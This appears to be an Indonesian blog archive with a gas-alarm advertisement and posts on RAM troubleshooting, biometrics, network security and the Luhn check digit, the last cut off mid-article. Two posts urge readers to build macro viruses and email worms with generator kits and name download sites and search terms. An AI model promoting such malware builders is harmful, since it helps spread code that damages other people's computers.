Jumat, 25 Februari 2011

Selasa, 28 September 2010

AWAS LEDAKAN GAS LPG

Awas ledakan gas lpg mengintai anda jangan sampai anda menjadi korban berikutnya, sayangi diri anda keluarga dan aset berharga anda dari bahaya ledakan gas lpg yang sering terjadi akhir-akhir ini yang banyak memakan korban harta benda bahkan nyawa. Tunggu apalagi sebelum terlambat gunakan" ALARAM DETEKSI GAS LPG" adalah solusi tepat dan aman untuk melindungi anda dan keluarga anda serta aset berharga anda dari bahaya kebakaran akibat ledakan gas lpg, menurut hasil survey 29 juta tabung lpg 3 kg tidak layak pakai ( sumber TV One 22/6/2010 ), penyebab kebakaran di indonesia didominasi akibat ledakan gas lpg ( sumber jawa pos 31/12/2009 ). Jadi tunggu apalagi sebelum terlambat pesan segera ALARAM DETEKSI GAS LPG sekarang juga dengan harga Rp. 250.000,- sudah termasuk ongkos kirim untuk wilayah jabodetabek.
Untuk Pemesanan segera hubungi :

JULIANTORO / UPIK MARIANI.
NO TELP: 021-70661797, 7223208.
NO HP: 081210950295, 089650598280.

Pembayaran via transfer ke :
BRI Cab. Parung Panjang
No Rek: 0802-01-023576-53-3 atas nama : JULIANTORO.

ALAMAT KAMI : GRIYA PARUNG PANJANG BLOK C1/ G10 RT002/06
KABASIRAN PARUNG PANJANG BOGOR.
Apabila anda sudah melakukan transfer uang, harap sms ke no HP diatas dengan format :#alaram#nama jelas#alamat lengkap#bukti transfer#jumlah transfer#tgl transfer#jumlah pesanan#.

Barang akan kami kirim setelah anda melakukan transfer uang.


TUNGGU APALAGI JANGAN ANDA MENUNDA LAGI SEBELUM ANDA MENJADI KORBAN BERIKUTNYA.

COBA BANDINGKAN UANG RP 250.000 DENGAN JIWA ANDA KELUARGA ANDA SERTA ASET BERHARGA ANDA, SUNGGUH ANDA PASTI MENYESAL BILA MUSIBAH LEDAKAN LPG TERJADI PADA ANDA.

ANDA AKAN MERASA MAHAL DENGAN HARGA RP. 250.000 BILA MUSIBAH LEDAKAN GAS BELUM MENIMPA ANDA, DAN ANDA AKAN MERASA MENYESAL TIDAK MEMBELI ALARAM GAS LPG BILA MUSIBAH LEDAKAN GAS MENIMPA ANDA KELUARGA DAN ASET BERHARGA ANDA.

SEBELUM TERLAMBAT MILIKILAH ALARAM GAS LPG SEKARANG JUGA, JANGAN RAGU DAN TERLALU BANYAK BERFIKIR UNTUK MENGELUARKAN UANG RP. 250.000 YANG ANDA GUNAKAN UNTUK MELINDUNGI KELUARGA DAN ASET BERHARGA ANDA DARI BAHAYA LEDAKAN GAS LPG YANG MENGAKIBATKAN KEBAKARAN.

ALARM ELPIJI

Spesifikasi Tambahan:

•Tegangan 220V AC

•Ambang batas gas ELPIJI : 10% (+/-5%) LEL

•Suhu kerja : -10 s/d 50 derajat celcius

•Kelembaban kerja : <95%RH

•Bisa mendeteksi ELPIJI, Gas Negara, dan Gas Alam

Cara Pengoperasian:

1.Hubungkan alarm dengan listrik 220V
2.LED Indikator warna hijau akan berkedip selama 2-3 menit, sebelum alarm aktif
3.Jika LED Indikator warna hijau akan menyala itu menunjukkan bahwa alarm telah aktif.
4.Saat terdeteksi kebocoran gas, LED Indikator warna merah akan berkedip & alarm akan berbunyi “beep….beep”.
5.Alarm akan berhenti berbunyi dan kembali bekerja normal setelah konsentrasi gas elpiji berada dibawah ambang batas.
6.Jika alarm berbunyi panjang dan LED Indikator warna merah menyala, itu menandakan bahwa alarm tidak berkerja, cabut alarm dari listrik 220V dan coba hubungkan dengan listrik kembali.

Cara Pemasangan :
Catatan : Sebagai informasi, gas elpiji adalah gas yang lebih berat dari udara
1.Pilih posisi instalasi yang tepat yaitu tinggi 0.3m - 1m dari lantai & radius dari sumber gas < 1.5 m
2.Gantungkan alarm ke dinding dengan paku
3.Hindari instalasi yang terlalu dekat dengan ventilasi, kipas angin, pintu, jendela, sumber uap, minyak, dll

Tindakan Darurat:

Alarm akan berbunyi jika intensitas gas elpiji yang terdeteksi melebihi ambang batas, Berikut adalah langkah-langkah yang harus dilakukan:

1.Matikan katup regulator pada tabung elpiji.
2.Buka jendela dan biarkan udara masuk.
3.Matikan sumber-sumber api.
4.Hindari pemakaian alat-alat listrik termasuk menyalakan lampu
5.Cek kebocoran gas dan hubungi petugas yang berpengalaman.



Pemakaian tabung gas telah meluas di kalangan masyarakat kita. Tetapi seperti yang kita ketahui, ada bahaya mengancam yang mengintai saudara yang tidak waspada!!!

Sebagai bukti lihat deretan berita-berita ini:

1. Saat ini penyebab kebakaran yang terjadi DIDOMINASI karena MELEDAKNYA GAS ELPIJI (JAWA POS 31 Des 2009 Hal. 30)
2. Korban tewas ledakan tabung gas mencapai 21 orang.MetroNews
3. Tabung Elpiji 12 kg meledak, 1 orang mengalami luka bakar serius di tubuhnya. MetroNews
4. Ledakan tabung gas di Tangerang. Kompas.com
5. Tabung gas artis pun juga kena. Okezone
6. Ratusan tabung gas ditemukan bocor Liputan 6
7. Selang gas penyebab gas bocor Kompas.com
8. Berbagai daerah meragukan dan waspada terhadap penggunaan tabung gas Kompas.com
9. Saat sahur, warga kebun jeruk Jakarta terkena ledakan gas Kompas.com
10. Balita menjadi korban ledakan gas Kompas.com
11. Ditemukan 25.994 Tabung Gas Elpiji Rusak di Jombang Tempo Interaktif


Kebocoran Gas ELPIJI dapat disebabkan oleh :

1. Kualitas Tabung Gas, Regulator, Selang & Komport Gas yang buruk
2. Pemasangan / Instalasi yang KURANG TEPAT
3. Selang digigit tikus dan aus karena faktor usia

Segera lindungi diri anda, keluarga, dan aset berharga anda dengan ALARM KEBOCORAN GAS ELPIJI
ALARM ini memberikan perlindungan selama 24 JAM penuh sehingga sangat cocok digunakan baik untuk di dapur maupun di kamar mandi pada rumah tangga, hotel, restaurant, vila, usaha katering dan lainnya.

VIDEO ALARAM GAS LPG :
http://www.youtube.com/watch?v=9Jnub2DdwcM&feature=player_embedded

Rabu, 23 Juni 2010

Mengatasi masalah pada RAM

Q : Mengapa Windows mendeteksi RAM yang lebih sedikit dari yang sesungguhnya ?
A : Ada banyak hal yang menyebabkan, diantaranya adalah :

1. "Kerusakan" fisik". Untuk mengatasinya Anda harus memeriksa kondisi fisik RAM tersebut. Buka casing komputer Anda, lalu cabut RAM tersebut. Bersihkan apabila RAM dan socketnya kotor. Periksa juga apakah ada karat. Anda juga harus memastikan bahwa RAM tersebut dari bahan yang sama (keemasan atau keperakan). Jika berbeda, sebaiknya Anda mengganti RAM tersebut.
2. ROM Shadowing Pada beberapa BIOS dan driver 16 bit, kadang-kadang memakai sebagian (baca : sedikit) RAM sebelum Windows dijalankan. Beberapa BIOS juga terdapat feature ROM shadowing yang akan mengcopy isi dari system dan video BIOS ROM ke RAM guna meningkatkan performa komputer (Pada DOS dan Windows 3.1 ). Hal ini karena kecepatan ROM lebih rendah dari RAM. Tetapi jika Anda memakai Windows 95/98/NT dengan memori yang minim sebaiknya feature ROM shadowing dimatikan saja (dari CMOS setup), karena Windows 95/98/NT jarang sekali mengakses ROM sehingga RAM tersebut dapat digunakan oleh Windows.
3. Penggunaan VGA card on board. Jika misalnya Anda memiliki RAM 32 Mb dan VGA card 2 Mb, maka RAM yang dapat digunakan hanya sebesar 30 Mb (32 Mb - 2 Mb). Jadi sebaiknya jangan memakai VGA card on board.
4. Terdapat driver atau program yang dijalankan dari config.sys atau autoexec.bat yang bekerja menggunakan RAM. Solusinya : Edit file autoexec.bat dan config.sys dengan menggunakan Notepad. Lalu editlah pada baris yang "mencurigakan" atau yang kira-kira digunakan untuk me-load program. Bila ketemu tambahkan kata REM (tetapi bila Anda menambahkan kata REM maka program tersebut tidak akan di-load/dijalankan). Bila Anda memakai driver CD-ROM 4x dari Teac, ubahlah parameter xmssize= -1 pada autoexec.bat menjadi xmssize=0.
5. Virtual device driver dijalankan dari system.ini. Untuk mengatasinya buka system ini dengan cara klik Start - Run - ketikkan sysedit. Pilih system.ini. Lalu editlah pada baris yang kira-kira digunakan untuk meload virtual device driver. Alternatif lainnya adalah dengan membuat file system.ini yang baru.
6. Terdapat baris Maxphyspage pada file system.ini Silakan lihat pada file system.ini, apakah terdapat baris Maxphyspage atau tidak. Jika ya, hapus baris tersebut.
7. Kesalahan pada CMOS setting. Pada beberapa komputer terdapat feature Memory Hole at 16 Mb atau Hold to 15 Mb RAM. Jika feature tersebut di enable maka jika Anda memiliki RAM yang lebih besar dari 15 Mb atau 16 Mb, Windows tetap akan mendeteksi sebesar 15 Mb atau 16 Mb. Untuk mengatasi hal ini, silakan di disable feature tersebut.
8. Meload Ramdrive.sys dari config.sys Check your Config.sys file for a line containing "Ramdrive.sys." If you have this line, it means you are using a RAM drive. To disable the RAM drive, remove or disable the line in the Config.sys file that contains "ramdrive.sys." To disable the line, use a text editor (such as Notepad) to edit the Config.sys file and place a semicolon (;) at the beginning of the line. Buka file config.sys dengan Notepad. Cek pada file tersebut, apakah terdapat baris ramdrive.sys. Jika ya, hapus baris tersebut

Q : Setelah menambah RAM, mengapa RAM yang terdeteksi masih sama ?
A : Setelah Anda menginstall RAM, Anda harus melakukan Setup BIOS ulang. Caranya, pada saat pertama kali menghidupkan komputer sampai muncul logo BIOS, tekan Del (untuk beberapa komputer mungkin Ctrl+Alt+Del atau kombinasi key yang lain). Setelah selesai, pilih Save Setting and Exit. Sebagai tambahan informasi untuk setting tersebut, Anda bisa membaca pada manul booknya.

Q : Mengapa terjadi error setelah saya menginstall RAM baru ?
A : Anda bisa melihat pada manual booknya. Untuk beberapa BIOS : Jika Anda menginstall (misalnya) 2-4 Mb SIMMS dan 2-8 Mb SIMMS, Anda harus meletakkan RAM yang lebih besar pada Bank 1.

Q : Setelah saya menginstall RAM baru, mengapa sering terjadi Blue Screen ?
A : Pada komputer yang menggunakan bus 66 MHz (Pentium 133 atau yang lebih tinggi), dibutuhkan RAM dengan kecepatan 60 ns atau yang lebih tinggi. Anda bisa saja menggunakan RAM dengan kecepatan yang lebih kecil dari 60 ns tapi Anda harus mengubah setting Wait State pada BIOS. Ubahlah setting tersebut dari 0 (nol) menjadi 1 (satu).

Q :Mengapa muncul tulisan Parity Check Error ?
A : Tulisan parity check error dapat muncul jika terdapat kerusakan pada salah satu RAM, salah satu proses DMA tidak berjalan dengan lancar, atau karena terdapat virus parity boot pada hard disk Anda.

Membuat virus macro sendiri

Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.

Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.

Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?

Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.

Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus di sini. Koleksinya sangat lengkap!

Selamat mencoba!

Biometric, Badan Anda Adalah Password

Dalam dunia perdagangan seperti e-commerce, kepercayaan (trust) merupakan kunci utama terjadinya transaksi. Secara konvensional umumnya kita menggunakan berbagai teknik password & security yang di bangkitkan melalui data yang masukan ke komputer. Data tersebut umumnya di masukan secara manual menggunakan tangan.

Beberapa konsep telah dikembangkan untuk menjamin kepercayaan (trust) tersebut. Contoh yang sering kita kenal, ada konsep Certificate Authority(CA) yang merupakan badan autoritas yang melakukan registrasi identitas dari semua pelaku transaksi yang bisa di pertanggung jawabkan indentitasnya. Pengamanan Certificate Authority dilakukan dengan mekanisme penyandian / enkripsi yang bertumpu pada Public Key Infrastructure (PKI) yang menggunakan pasangan kunci (kunci public & kunci private) untuk menyandikan informasi yang akan dikirim.

Sialnya konsep CA & PKI ini, kita mengandalkan informasi identitas yang dimasukan secara manual kedalam sistem. Umumnya, tidak ada keterkaitan antara data di CA & PKI dengan data fisik (badan) dari pelaku transaksi. Hal ini agak menyulitkan karena seluruh proses akan sangat tergantung kepada keahlian si pelaku dalam menyimpan password / kunci private yang biasa digunakan dalam proses transaksi. Untuk mengatasi hal ini maka mulai berkembang pemikiran-pemikiran untuk menggunakan anggota badan sebagai komponen "password" untuk authentikasi dalam menjamin kepercayaan (trust). Hal ini tampak nyata sekali dalam pameran COMDEX di Las Vegas akhir tahun 2000 yang lalu dimana penulis berkesempatan untuk hadir atas sponsor dari rekan-rekan di Asosiasi Pengusaha Komputer Indonesia (APKOMINDO).

Biometric merupakan teknik authentikasi yang mengambil karakteristik fisik seseorang. Ada beberapa teknik yang sering digunakan dalam authentikasi biometric. Beberapa diantara-nya adalah:

Biometric merupakan teknik authentikasi yang mengambil karakteristik fisik seseorang. Ada beberapa teknik yang sering digunakan dalam authentikasi biometric. Beberapa diantara-nya adalah:

* Pengenalan sidik jari, barangkali termasuk yang paling cost effective akan tetapi tetap mempertahankan tingkat keamanan yang tinggi dan kemudahan untuk penggunaan. Beberapa peralatan yang di pamerkan juga memperlihatkan sensor sidik jari yang terpasang pada mouse, pintu dll.
* Pengenalan sidik jari dapat dikembangkan lebih lanjut untuk pengenalan telapak tangan. Seperti yang sering kita lihat dalam film-film detektif / action luar negeri.
* Pengenalan Suara (Voice Scan) merupakan teknik lain yang merupakan bagian dari voice recognition. Tentunya teknik ini harus di perhalus untuk keperluan authentikasi, untuk keperluan non-authentikasi sudah di kenal dalam dunia telekomunikasi untuk automatisasi layanan pelanggan berdasarkan perintah suara.
* Pengenalan muka (facial scan) merupakan teknik authentikasi lainnya yang akan mengenal muka seseorang dari hasil pengindraan kamera digital.
* Signature Verification (verifikasi tanda tangan) dapat juga dilakukan secara otomatis menggunakan teknik pengenalan citra digital.
* Iris Scan & Retina Scan, melakukan verifikasi dari retina mata - menurut sebagian peneliti tampaknya scan retina ini merupakan teknik yang termasuk paling ampuh untuk melakukan authentikasi di bandingkan sidik jari.
* Keystroke Dynamik - merupakan teknik authentikasi yang paling unik karena teknik ini melihat cara kita mentik password di atas keyboard. Kebetulan saya sempat melihat sendiri dari dekat di COMDEX 2000 Las Vegas, jadi sistem akan belajar terlebih dulu dari sekitar 20-30 keystroke password yang kita masukan, jadi walaupun password kita di curi orang, si pencuri tidak akan bisa membobol sistem kita karena cara masing-masing orang dalam men-tik di papan keytboard akan selalu berbeda satu dengan lainnya. Perbedaan ini yang di deteksi oleh keystroke dynamic ini.

Umumnya para vendor juga telah mengembangkan teknik-teknik proteksi supaya sensor untuk scan berbagai bagian tubuh ini tidak tertipu mentah-mentah oleh maling / pencuri. Contohnya untuk scan sidik jari, sensor di lengkapi fasilitas pendeteksi pantulan kulit yang benar agar tidak tertipu jika pembobol menggunakan sarung tangan dengan sidik jari pengguna.

Untuk informasi lebih lanjut tentang biometric ini dapat dibaca di beberapa situs besar di Internet seperti:

* http://dobi.com/a_bio1/vendor/vendor_index3.htm - berisi daftar vendor Biometric.
* http://homepage.ntlworld.com/avanti/ - berisi buku / referensi cara kerja Biometric.
* http://www.ibia.org/ - International Biometric Industry Association.
* http://www.biometric.org - Biometric Consortium.

Cara Gampang Bikin Virus

Kamu pasti masih inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :

http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.

Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

Network security : apa dan bagaimana

Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang 'menakutkan' dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

* resiko / tingkat bahaya,
* ancaman, dan
* kerapuhan sistem (vulnerability)

Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

* Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
* Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
* Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

* Lapis ke-7 : Kebijaksanaan
* Lapis ke-6 : Personil
* Lapis ke-5 : Local Area Network
* Lapis ke-4 : Batas Dalam Jaringan
* Lapis ke-3 : Gateway
* Lapis ke-2 : Paket Filtering
* Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah "penyangga" yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.

Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep "TCP Wrapper". Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. "sockd" dijalankan oleh "inetd" pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

Algoritma Cek Digit Pada Kartu Kredit

Di dunia nyata tentunya Anda sudah mengetahui, atau setidaknya mendengar bagaimana kartu kredit telah diterima secara luas di masyarakat. Berbagai toko, dan penyedia layanan jasa telah menerima pembayaran dengan menggunakan kartu kredit. Saat ini di dunia maya (Internet), pembayaran dengan kartu kredit juga sudah mulai diterima secara luas. Berbagai kejahatan telah sering dilakukan dengan penggunaan kartu kredit ini, baik di dunia nyata maupun di dunia maya. Namun di artikel ini saya tidak akan membahas mengenai keamanan kartu kredit, saya hanya membahas suatu hal kecil yang disebut sebagai pengecekan digit pada kartu kredit. Hal ini memang cukup kecil, namun patut diketahui oleh semua orang.

Dalam proses pembayaran di Internet dengan menggunakan kartu kredit, ada suatu proses yang sangat diperlukan yaitu authentication, hal ini merupakan proses untuk membuktikan bahwa nomor kartu kredit yang dimasukkan adalah benar, dan yang memasukkan adalah orang yang berhak untuk menggunakan kartu itu. Hal ini tampaknya mudah dilakukan, sebuah program bisa langsung dihubungkan ke server bank dan bisa langsung diperiksa, tapi hal ini tentunya cukup menyita waktu, bagaimana jika nomor kartu yang dimasukkan ternyata salah ketik?, segala koneksi ke server bank, segala pencarian data dan lain-lainnya tentunya akan sia-sia.

Untuk (sedikit) memecahkan masalah di atas, nomor kartu kredit telah dirancang sedemikian rupa sehingga memungkinkan dilakukannya pengecekan awal sebelum sebuah nomor diperiksa melalui bank yang bersangkutan. Pengecekan ini adalah pengecekan kombinasi digit yang lazim dikenal dengan nama algoritma cek digit. Algoritma cek digit yang dipakai di kartu kredit adalah algoritma cek digit Luhn (Luhn check digit algorithm).

Algoritma Cek Digit Luhn
Algoritma cek digit merupakan suatu algoritma yang digunakan untuk mengecek validitas suatu angka berdasarkan digit-digit yang membentuknya. Salah satu aplikasi sangat umum yang kita temui dalam kehidupan sehari-hari adalah proses pemasukan data barang belanjaan yang kita beli di supermarket yang kecil (yang masih menggunakan input manual, tidak menggunakan bar code reader). Mungkin kadang-kadang Anda melihat kasir kadang-kadang salah memasukan data sehingga muncul sedikit pesan kesalahan dan kemudian dia mengetik ulang kembali kode barang yang tercantum di barang. Pernahkah Anda berpikir bagaimana komputer bisa tahu bahwa nomor tersebut salah?. Jawabnya adalah dengan menggunakan cek digit, biasanya digit terakhir dari kode barang itu merupakan hasil operasi matematis terhadap digit-digit sebelumnya, sehingga jika ada kesalahan input langsung terdeteksi, misalnya kode barang adalah 98876768532 tetapi yang dimasukkan adalah 98876768533 komputer akan menganggap data ini salah. Andaikan cek digit ini tidak ada, dan setiap kode barang dibuat urut, komputer akan menganggap benar semua data yang dimasukkan, mungkin akan tercantum Anda membeli sebatang coklat Silver Queen padahal yang Anda beli adalah coklat merek lain.

Untuk algoritma cek digit Luhn, sebenarnya saya kurang mengerti sejarah cek digit dengan algoritma ini, tapi algoritma ini dipakai oleh semua bank besar yang mengeluarkan kartu kredit (Visa, MasterCard, Amex, Novus, dan mungkin masih banyak yang lain). Algoritma cek digit ini juga dipakai di kartu-kartu ATM, setidaknya yang sudah saya perhatikan kartu ATM Bank BNI dan BII sepertinya bank yang lain juga menggunakan cara ini. Ketika pihak Telkom memperkenalkan TeCC (Telkom Calling Card), algoritma ini juga dipakai.

Metode cek digit ini sebenarnya sederhana, hanya perlu tiga langkah untuk membuktikan apakah suatu kartu memenuhi algoritma cek digit Luhn, untuk kartu dengan jumlah digit genap (mis Visa [16 digit], MasterCard[16 digit], dan Novus[16 digit]) caranya sebagai berikut :

